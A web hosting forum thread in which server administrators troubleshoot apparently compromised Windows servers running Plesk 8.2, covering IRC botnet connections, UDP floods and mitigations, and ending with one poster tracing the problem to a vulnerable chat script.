Results 1 to 18 of 18
  1. #1

    Plesk 8.2 appears vulnerable

    This is a post in SWSoft forum http://forum.swsoft.com/showthread.p...766#post194766 )

    I have experenced same problem, my problem begins 40 days ago,
    I restarted server it didnt come back, so OS Reload, restoring plesk backups, one week later i Restarted Server and then server didnt come back again, so OS Reload,
    Again and again, I bought Firewall for server(cisco checkpoint X16) this time F-Secure unistalled every day, the planet installed it and it unistall, after all problems they said 3 days ago that there is a problem with plesk and i should wait for Solution From SWSoft,
    I mention that i had F-Secure from time i got server and i had no problem for 4 monthes,

    I also ask anyone who experenced something like these to tell us,

  2. #2
    Join Date
    Apr 2005
    Location
    Cochin
    Posts
    2,452
    I beleive you must send a direct mail to swsoft support. They would be more than willing to help you as its a company who is proud of their product .

    Dont forget to post your findings here

  3. #3

    i have asked theplanet

    Hi,
    I have asked theplanet and they said this is a vulnerable in plesk and swsoft is working on it, if you check there is a post in swsoft forum but no one answered.
    MY Question is now is this theplanet problem or SWSOFT? i want to know any one exprienced it?
    another is i checked server last night it seems that some one was on Remote desktop i checked cureit.exe was installed on desktop, and was runnig, i asked the planet support chat and they said no one is working on my server.... but i checked cureit.exe, that is a product from DR web antivirus... does hackers check my system for viruses?

  4. #4
    I've seen a UDP flood running from one of our Windows web servers.

    It keeps triggering my pager when bandwidth peaks. It was at first consuming up to 100Mbit of bandwidth but I lowered the port to 10Mbit to mitigate damages and keep killing it when it restarts. I've now got it under wraps for this particular botnet by blocking all their IPs.

    I found that using tcpview.exe to kill the w3wp.exe process that was connected to IRC servers on 6667 made it stop for a bit until they restarted it. I was able to monitor and get onto the IRC server using wireshark and find out some additional details. The botnet was run by two users who are using it to UDP flood some nameservers and had 500+ bots on the server.

    I think this may be in Plesk as stated and have applied the latest Plesk 8.2.0.1 updates.

    I can't find any good rootkit revealer type tools for 64-bit Windows but I'm pretty sure Win64 isn't supposed to have as much problems with rootkits becuase of driver signing and the fact most are written for 32-bit.

    If it is a new Plesk issue I hope a patch is released shortly!

  5. #5
    Join Date
    Apr 2005
    Location
    Cochin
    Posts
    2,452
    Quote Originally Posted by hamed23100 View Post
    Hi,
    MY Question is now is this theplanet problem or SWSOFT? i want to know any one exprienced it?
    another is i checked server last night it seems that some one was on Remote desktop i checked cureit.exe was installed on desktop,

    Its an swsoft problem and swsoft usually uses cureit to troubleshoot issues related to spyware, so it could be them who logged in to your server

  6. #6
    Hi,

    I see same problem on server which are located different datacenters. Plesk is vulnerable not The Planet.

    Hackers uses your server for sharing divx videos or attacking other servers.

  7. #7
    Quote Originally Posted by activelobby4u View Post
    Its an swsoft problem and swsoft usually uses cureit to troubleshoot issues related to spyware, so it could be them who logged in to your server
    Swsoft and I use cureit to troubleshoot this issue. hackers don't install cureit

  8. #8

    are you sure

    Hi,

    I am still in dobt...

    The user was logged in as administrator with client name VZWIN2 (user name was administrator, Clinet name is not user name , it is computer name of person who logged in)

    I have sent several PM by task manager but no answer, also the planet support told when he logged in his session nothing was running and when he closed session everything that was running and i saw in task manager closed.

    Now new question is client name VZWIN2 one of SWSoft support computer name?
    Why he didnt answered??

    or If he is hacker and have remote desktop why he didnt delete data or change it? i am really worry and becomming crazy.

    Regards,
    Hamed

  9. #9
    I keep seeing outbound connections to remote servers on port 6667 from w3wp.exe. I can kill this in TCPView and it doesn't affect other services.

    Anyone know a good software firewall that works on Win2003 64-bit? I need to block outgoing connections to most ports - unforuntately Plesk moved to Windows Firewall from RRAS which doesn't do this.

    For now I've added bogus routes for the IPs they've connected to and this has stopped all the outbound connections for a good 24 hours.

    I guess it's time to get a Juniper device going unless there's a IPCHAINS / APF equivilient for Win that's reliable?

    I welcome any input on this as it's been very frustrating.

  10. #10
    Join Date
    Apr 2005
    Location
    Cochin
    Posts
    2,452
    Quote Originally Posted by nzych View Post
    I guess it's time to get a Juniper device going unless there's a IPCHAINS / APF equivilient for Win that's reliable?
    You can use ipsec

  11. #11

    Let me explain my problem fully

    Hi,

    Let me explain my problem fully and you tell if it could be a hack,
    I have had no problem till i do first OS Reload, after that server was ok for one week till the planet updated my F-Secure and after a restart Server wents down, and they said another OS Reload, again they have do an Update on MY F-Secure and and another restart nothing happend but exactly a week latter and it was second restart, server didnt respond, this time outage ticket was going so long and they bringed back my server but no RDP just installed VNC and told me use that
    They told me some changes on Registry that closed RDP but i asked a security person, he told me for changes on Registry it needs someone to login with Administrator roll.... but if he login with administrator, why he closed RDP? why he didnt delete data? or changes data?

    and after that i done another os reload and then ordered a cisco firewall and F-secure installed again, but some days latter i saw an email on my server... IP Allert, server was restarted i logged into server and saw...wow.... F-Secure was unistalled? i created a ticket and TP installed it again another restart server comes back, again day after that i comed back. no F-Secure but No Restart... they said this is SWSoft Problem? could it be?

    Could it be hack really?

    Regards,
    Hamed

  12. #12
    Join Date
    Sep 2007
    Location
    Planet Earth
    Posts
    154
    Hi,

    Let me butt in if I may. From the conversation you seem to be having you are using a WINDOWS version of PLESK 8.2. If you read very carefully through the product manuals given out by SWSoft, they prefer LINUX as their operating system of choice because of it's stability and well, ability to resist hackers.

    PLESK 8.2 on LINUX is safer than PLESK (anything) on WINDOWS2003 (32/64). I know this for a fact because I used to host WINDOWS 2003 Dual AMD 64's and had nothing but problems. I am now lucky if I get an email a month from my members because I converted to just LINUX RED HAT AS 4.6 with PLESK 8.2

    If you are having problems it is more than likely because you are on a WINDOWS based system.

    - 64bithost
    Professional Plesk Webhosting.
    No overselling.
    Always available for you.
    http://www.64bithost.com - 1-352-3164619

  13. #13

    this was not my answer

    Hi,

    This was not my answer... i want to know could this situation be a hack? could it be from Plesk?
    IS Some one from theplanet doing that ?....

    Regards,
    Hamed

  14. #14
    Join Date
    Sep 2007
    Location
    Planet Earth
    Posts
    154
    I cannot answer to the actual fact as if it is a "hack". To better answer you question email dennis at swsoft.com his email address is info@swsoft.com. Sometimes, swsoft will login to your windows server and put software to monitor new changes. You will see if you have 'root' access that someone has loged in to the vz and that is all I'm going to expose in a public forum about PLESK. dennis is their security officer/ main programmer and can explain it to you in confidential email.
    Professional Plesk Webhosting.
    No overselling.
    Always available for you.
    http://www.64bithost.com - 1-352-3164619

  15. #15

    Please help me

    i have sent mail, but regarding to my last emails i know they wont answer,
    I hope i can get answer from specialists and server owners who are in this forum,
    Please give me they way to make sure if it is a hack or from swsoft

    Regards

  16. #16

    they dont answer, they asked money

    Hi,

    I got email from them and they said creat ticket and pay money to geting answer.
    It seems nobody ready to say if this problem is from plesk or...?
    Any opinion?

    Regards,
    Hamed

  17. #17
    Join Date
    Aug 2007
    Posts
    60
    It's not that they are being lazy, or trying to say it is not their problem. You are looking for an answer that no one has yet. If SWSoft, The Planet, ANYONE... had the answer, a patch would be released(official or not).

    Do some recon, setup a honey pot, block some ips, see what you can find yourself, it will only help bring everyone closer to a solution.

    The Planet uses linux workstations. I'm not sure what rdesktop identifies as(maybe VZWIN2). It is also very possible it is SWSoft as VZ is something they use a lot(VZMC, Virtuozzo, VZPP, VZCP, vzctl, etc...).

    While it is not very nice that they did not respond to you, this does not mean it was not a tech. When you are trying to do your job, and investigate something, and a customer wants to chat with you about the problem... It can be quite distracting, so messages like those are often ignored.

  18. #18

    w3wp UDP Flood

    I have had one of our Windows Server 2003 systems spiking our bandwidth at near 100% the past few weeks. I have had to manually kill the w3wp processes running on UDP (using tcpview).

    I host many websites on this system. We separated them all into individual application pools, and we narrowed it down to one website. Looking through the logs reavealed an exploit in a flash chat script were using. We renamed the chat folder to something not linked or guessable and it went away.

    You will not find an infected file on your system. The attack is including a remote file via http that opens up an IRC channel on port 6667 then listens for commands to start a ddos attack with UDP packets, etc.

    Google aedating4CMS and you will find out much about the hack.

    Hope this helps anyone. I spent much time tracking this down and wanted to share to help!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •